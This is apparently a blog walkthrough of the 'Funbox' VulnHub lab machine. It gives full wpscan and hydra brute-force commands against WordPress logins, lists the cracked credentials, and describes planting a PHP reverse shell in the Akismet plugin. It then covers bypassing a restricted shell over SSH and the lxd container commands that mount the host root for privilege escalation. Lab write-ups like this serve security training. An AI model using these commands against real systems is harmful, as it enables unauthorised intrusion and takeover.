MACHINE: FUNBOX
FROM: OSCP PLAYGROUND/VULNHUB
LEVEL: MEDIUM
Nmap
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 ProFTPD
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/secret/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OPEN PORTS
21 FTP
22 ssh
80 web includes robots.txt
ENUMERATION
PORT 21
It's an FTP port so try to login anonymous login, anonymous login is not allowed on this machine (it ask for a password)
PORT 22
it's a standard ssh port, version OpenSSH 8.2p1 so nothing is vulnerable
PORT 80
when iam access that machine throw the web it redirects to this domain http://funbox.fritz.box/
so we add this domain to our /etc/hosts
now its work
WordPress Site
in background [wpscan running] [ directory bruteforcing running]
further enum
lets check robots.txt
found /secret/ directory
FFUF and WPSCAN's Finished
wp-includes.php
id3 and ixr have exploits but it won't work maybe a rabbit hole so I didn't spend much time on this
[wpscan finished]
Found Two usernames
lets brute force the password using wpscan you also can use hydra
wpscan --Url http://funbox.fritz.box/ -U admin -P /opt/rockyou.txt
second user joe password bruteforce
this time we use hydra to bruteforce :)
hydra -l joe -P /opt/rockyou.txt funbox.fritz.box -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
compare to wpscan hydra is more lightweight and powerful
CREDS
admin - iubire
joe - 12345
we logged in as joe but we are just a user, we need an admin panel to get revershell
so next we login via admin (second user)
admin
yep we are now admin
there are multiple ways to get a revershell shell
convert PHP file to zip then upload plugins and install the plugin
or upload your PHP file at plugins/themes (some times won't work)
or use msfconsole
use exploit/Unix.web app/wp_admin_shell_upload
EASIEST WAY
upload your PHP file here then access /plugin/aksimet/aksimet.php
it is inactive so active this
access this PHP file
funbox.fritz.box/wp-content/plugins/akismet/akismet.php
we got a shell
HORIZONTAL PRIVELEGE ESCALATION
we have the password of joe
machine have ssh
Let's login via sssh
ssh joe@192.168.136.77 -t "bash --noprofile"
(to bypass restricted bash shell)
funny user executing the backup.sh (crontab) so I include revershhell
we are in and group
what is lxd?
it's also similar to docker container It offers a user experience similar to virtual machines but using Linux containers instead.
steps to exploit
attacking machine and we are connecting throw a private VPN so we can't use GitHub to clone the repo
so we download and build at our local machine and send to victim machine via python server
a rootfs.squashfs and lxd.tar.xz
lxc init alpine privesc -c security.privileged=true (if any error do lxc init)
lxc list
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
That's it :)
Maja pa, maja pa
ReplyDeletePost a Comment